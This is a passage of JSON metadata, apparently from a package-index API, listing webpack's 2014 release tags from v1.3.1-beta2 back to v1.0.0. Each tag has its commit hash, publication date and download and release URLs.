.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G